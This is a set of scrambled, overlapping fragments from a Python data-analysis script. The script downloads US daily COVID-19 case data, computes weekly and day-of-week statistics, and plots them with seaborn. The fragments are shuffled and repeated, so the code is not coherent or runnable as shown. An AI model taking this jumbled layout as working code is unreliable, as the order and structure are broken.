df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease,", "# =========================================================================== # # FUNCTIONS # =========================================================================== # # -- Data Analytics --", "= plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 |", "return series.shift(-period) - series def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] <", "# -- Main Program -- # def main(): df = extract_data() df =", "format='%Y%m%d') # Set the date as the DataFrame's index. df = df.set_index('date') #", "# =========================================================================== # # -- Data Analytics -- # def plot_series(df: pd.DataFrame): fig", "| Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() #", "def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a", "module's API -- the list of exportable objects (classes, # functions, etc.) --", "processing data and creating visual summaries for this study. \"\"\" # =========================================================================== #", "df.rename(columns=COLUMNS, inplace=True) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True,", "'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday',", "USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') #", "Return data frame for reuse. return df # -- Data Processing: Load --", "in the main module, call the main() function. if __name__ == '__main__': main()", "and preview(df, rename_columns.__name__) # Return data frame for reuse. return df # --", "index. df = df.set_index('date') # Add date-derived columns. df['date'] = df.index.date df['year'] =", "Set the date as the DataFrame's index. df = df.set_index('date') # Add date-derived", "def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return True else:", "the date as the DataFrame's index. df = df.set_index('date') # Add date-derived columns.", "data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG and preview(df, extract_data.__name__)", "a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data", "fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow',", "frame. DEBUG and preview(df, rename_columns.__name__) # Return data frame for reuse. return df", "type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x - mean) /", "frame for reuse. return df # -- Data Processing: Transform -- # def", "# Debug data frame. DEBUG and preview(df, rename_columns.__name__) # Return data frame for", "Python Standard Library -- # import os # -- 3rd Party -- #", "and row['day1LeadDelta'] > 0: return True else: return False def percent(num, denom): return", "Main Program -- # def main(): df = extract_data() df = transform_data(df) visualize_data(df)", "Data Processing: Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df)", "(Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__", "as CSV from an API. df = pd.read_csv(SOURCE_URL) # Save a copy of", "'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',", "summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and preview(df, visualize_data.__name__) # Return data", "and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults. Set the", ") # Debug data frame. DEBUG and preview(df, rename_columns.__name__) # Return data frame", "= lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum']", "fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data", "for reuse. return df # -- Data Processing: Extract -- # def extract_data()", "# -- Data Analytics -- # def plot_series(df: pd.DataFrame): fig = plt.figure() ax", "-- 3rd Party -- # import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt", "fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults. Set the default figure size.", ") # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1)", "# Debug data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use", "def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df = add_columns(df) # Debug", "-- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df = add_columns(df)", "data frame for reuse. return df # -- Data Processing: Extract -- #", "plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year", "frame. DEBUG and preview(df, extract_data.__name__) # Return data frame for reuse. return df", "-- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS #", "fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19", "style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax =", "Return data frame for reuse. return df # -- Data Processing: Transform --", "Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug data frame. DEBUG and", "for reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS,", ") df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) #", "- series def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return", "of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG", "# def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df = add_columns(df) #", "df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] =", "series.shift(-period) - series def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0:", "df # -- Data Processing: Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame:", "=========================================================================== # # CONSTANTS # =========================================================================== # # -- Data -- # DAILY", "sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax", "of Local Maxima of Cases') # Debug data frame. DEBUG and preview(df, summarize_maxima.__name__)", "plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year", "x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New", "= lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum']", "visual summaries for this study. \"\"\" # =========================================================================== # # METADATA # ===========================================================================", "index=True, ) # Debug data frame. DEBUG and preview(df, rename_columns.__name__) # Return data", "# =========================================================================== # # -- Main Program -- # # If this module", "=========================================================================== # # -- Data Analytics -- # def plot_series(df: pd.DataFrame): fig =", "frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date'))", "pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, )", "return df # -- Data Processing: Extract -- # def extract_data() -> pd.DataFrame:", "Return data frame for reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: #", "row['day1LeadDelta'] > 0: return True else: return False def percent(num, denom): return 100", "=========================================================================== # # IMPORTS # =========================================================================== # # -- Python Standard Library --", "# DEBUG = True # -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..')", "Maxima of Cases') # Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show()", "Debug data frame. DEBUG and preview(df, transform_data.__name__) # Return data frame for reuse.", "index=True, ) # Debug data frame. DEBUG and preview(df, add_columns.__name__) # Return data", "a \"wild import\" (`from field import *`). __all__ = [ 'DEBUG', ] #", "def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease',", "denom): return 100 * num / denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE", "of Cases') ax.xaxis_date() # plt.show() # Debug data frame. DEBUG and preview(df, plot_series.__name__)", "9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df,", "preview(df, extract_data.__name__) # Return data frame for reuse. return df # -- Data", "func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return", "=========================================================================== # # METADATA # =========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__", "df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add", "def set_figure_defaults(): # Use seaborn style defaults. Set the default figure size. sns.set(", "= pd.read_csv(SOURCE_URL) # Save a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False,", "Debug data frame. DEBUG and preview(df, add_columns.__name__) # Return data frame for reuse.", "True # -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data'", "plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and preview(df, visualize_data.__name__)", "and row['day1LeadDelta'] < 0: return True else: return False def local_min(row): if row['day1LagDelta']", "=========================================================================== # # -- Python Standard Library -- # import os # --", "Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug data", "= add_columns(df) # Debug data frame. DEBUG and preview(df, transform_data.__name__) # Return data", "data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New", "pandas as pd import seaborn as sns # =========================================================================== # # CONSTANTS #", "Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases')", "visualize_data.__name__) # Return data frame for reuse. return df # -- Data Processing:", "frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig =", "x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive", "def plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot(", "= 'daily' WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease':", "* num / denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =',", "USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show()", "\"\"\" # =========================================================================== # # METADATA # =========================================================================== # __author__ = 'Robert (Bob)", "plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug", "of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png')", "data frame. DEBUG and preview(df, extract_data.__name__) # Return data frame for reuse. return", "-> pd.DataFrame: df = rename_columns(df) df = add_columns(df) # Debug data frame. DEBUG", "False def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return True", "DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults. Set", "creating visual summaries for this study. \"\"\" # =========================================================================== # # METADATA #", "Debug data frame. DEBUG and preview(df, visualize_data.__name__) # Return data frame for reuse.", "The main module for processing data and creating visual summaries for this study.", "series.shift(period) def lead_delta(series, period): return series.shift(-period) - series def local_max(row): if row['day1LagDelta'] >", "'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging -- #", "= df.apply(local_min, axis=1) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv',", "ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG and preview(df,", "ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results' # -- URLs", "USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count", "= 'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020' # =========================================================================== # #", "] # -- Debugging -- # DEBUG = True # -- Filesytem --", "# Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df:", "-- Data Processing: Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df =", "__author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep", "'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df, df_weekly,", "=========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__", "/ std # -- Main Program -- # def main(): df = extract_data()", "the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG and", "# -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS", "# plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot(", "# # -- Utilities -- # def lag_delta(series, period): return series - series.shift(period)", "sns # =========================================================================== # # CONSTANTS # =========================================================================== # # -- Data --", "\"\"\" main.py - The main module for processing data and creating visual summaries", "__created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020' # =========================================================================== #", "set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and preview(df,", "= df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg(", "IMPORTS # =========================================================================== # # -- Python Standard Library -- # import os", "Program -- # def main(): df = extract_data() df = transform_data(df) visualize_data(df) #", "ax.xaxis_date() # plt.show() # Debug data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def", "'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday',", "df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG and preview(df, extract_data.__name__) #", "| Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of", "df.apply(local_min, axis=1) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True,", "df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1)", "Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame):", "# METADATA # =========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert", "std # -- Main Program -- # def main(): df = extract_data() df", "of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug data frame. DEBUG", "-- # def extract_data() -> pd.DataFrame: # Download source data as CSV from", "def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW,", "100 * num / denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type", "def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease',", "# -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR", "percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns.", "ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020", "num / denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__)", "<NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ =", "Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of Cases') # Debug", "> 0 and row['day1LeadDelta'] < 0: return True else: return False def local_min(row):", "# import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import pandas as pd", "=========================================================================== # # FUNCTIONS # =========================================================================== # # -- Data Analytics -- #", "# # -- Python Standard Library -- # import os # -- 3rd", "import os # -- 3rd Party -- # import matplotlib.dates as mpl_dates import", "1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum'] = df.apply(local_max,", "Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of Cases')", "and creating visual summaries for this study. \"\"\" # =========================================================================== # # METADATA", "DEBUG and preview(df, transform_data.__name__) # Return data frame for reuse. return df def", "| Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of", "reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True)", "'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # =========================================================================== # # -- Data Analytics", "reuse. return df # -- Data Processing: Extract -- # def extract_data() ->", "Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG", "Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show()", "as mpl_dates import matplotlib.pyplot as plt import pandas as pd import seaborn as", "# # MAIN EXECUTION # =========================================================================== # # -- Main Program -- #", "Debug data frame. DEBUG and preview(df, rename_columns.__name__) # Return data frame for reuse.", "return df # -- Data Processing: Transform -- # def transform_data(df: pd.DataFrame) ->", "pd import seaborn as sns # =========================================================================== # # CONSTANTS # =========================================================================== #", "fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19", "= 'Sep 16, 2020' # =========================================================================== # # EXPORTS # =========================================================================== # #", "data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig", "matplotlib.pyplot as plt import pandas as pd import seaborn as sns # ===========================================================================", "df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek", "this module is in the main module, call the main() function. if __name__", "# ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results' # --", "= percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta", "if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return True else: return False", "2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of", "CONSTANTS # =========================================================================== # # -- Data -- # DAILY = 'daily' WEEKLY", "# -- Debugging -- # DEBUG = True # -- Filesytem -- #", "Debug data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn", "ax.set_ylabel('Percent of Weekly Count of Cases') # Debug data frame. DEBUG and preview(df,", "data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, add_columns.__name__)", "percent(num, denom): return 100 * num / denom def preview(df: pd.DataFrame, func_name: str):", "# Debug data frame. DEBUG and preview(df, visualize_data.__name__) # Return data frame for", "plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year", "= extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION #", "Weekly Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) #", "Library -- # import os # -- 3rd Party -- # import matplotlib.dates", "df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease,", "| USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local", "Return data frame for reuse. return df # -- Data Processing: Extract --", "ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug data frame.", "True else: return False def percent(num, denom): return 100 * num / denom", "module for processing data and creating visual summaries for this study. \"\"\" #", "# plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot(", "field import *`). __all__ = [ 'DEBUG', ] # =========================================================================== # # IMPORTS", "style defaults. Set the default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, )", "module is in the main module, call the main() function. if __name__ ==", "=', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x - mean) / std", "*`). __all__ = [ 'DEBUG', ] # =========================================================================== # # IMPORTS # ===========================================================================", "Standard Library -- # import os # -- 3rd Party -- # import", "df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, rename_columns.__name__) #", "preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax =", "# Debug data frame. DEBUG and preview(df, extract_data.__name__) # Return data frame for", "df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] =", "DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure()", "# # IMPORTS # =========================================================================== # # -- Python Standard Library -- #", "URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # ===========================================================================", "columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy", "df.set_index('date') # Add date-derived columns. df['date'] = df.index.date df['year'] = df.index.year df['month'] =", "DataFrame's index. df = df.set_index('date') # Add date-derived columns. df['date'] = df.index.date df['year']", "# Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) #", "-- Data Processing: Extract -- # def extract_data() -> pd.DataFrame: # Download source", "data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, rename_columns.__name__)", "of Week') ax.set_ylabel('Percent of Weekly Count of Cases') # Debug data frame. DEBUG", ") # Debug data frame. DEBUG and preview(df, add_columns.__name__) # Return data frame", "'../data' RESULTS_DIR = '../results' # -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' #", "New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug data frame.", "pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date as", "preview(df, add_columns.__name__) # Return data frame for reuse. return df def rename_columns(df: pd.DataFrame)", "df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, )", "# SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # =========================================================================== # #", "# plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot(", "-- # import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import pandas as", "extract_data.__name__) # Return data frame for reuse. return df # -- Data Processing:", "-- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR =", "of Weekly Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__)", "os # -- 3rd Party -- # import matplotlib.dates as mpl_dates import matplotlib.pyplot", "=========================================================================== # # EXPORTS # =========================================================================== # # Define the module's API --", "Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases')", "RESULTS_DIR = '../results' # -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # ===========================================================================", "# def extract_data() -> pd.DataFrame: # Download source data as CSV from an", "print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x -", "= { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW =", "preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults. Set the default", "Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent", "= rename_columns(df) df = add_columns(df) # Debug data frame. DEBUG and preview(df, transform_data.__name__)", "'daily' WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease',", "def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x,", "Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df =", "axis=1) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, )", "-- the list of exportable objects (classes, # functions, etc.) -- when performing", "this study. \"\"\" # =========================================================================== # # METADATA # =========================================================================== # __author__ =", "# DAILY = 'daily' WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos', 'negative':", "'Saturday', ] # -- Debugging -- # DEBUG = True # -- Filesytem", "# # -- Data Analytics -- # def plot_series(df: pd.DataFrame): fig = plt.figure()", "Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug", "as plt import pandas as pd import seaborn as sns # =========================================================================== #", "'Friday', 'Saturday', ] # -- Debugging -- # DEBUG = True # --", "ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of Cases') # Debug data frame.", "Local Maxima of Cases') # Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) #", "index=False, ) # Debug data frame. DEBUG and preview(df, extract_data.__name__) # Return data", "-- Data Processing: Load -- # # -- Utilities -- # def lag_delta(series,", "def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame.", "# Return data frame for reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame:", "rename_columns(df) df = add_columns(df) # Debug data frame. DEBUG and preview(df, transform_data.__name__) #", "[ 'DEBUG', ] # =========================================================================== # # IMPORTS # =========================================================================== # # --", "'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020' # =========================================================================== # # EXPORTS", "__all__ = [ 'DEBUG', ] # =========================================================================== # # 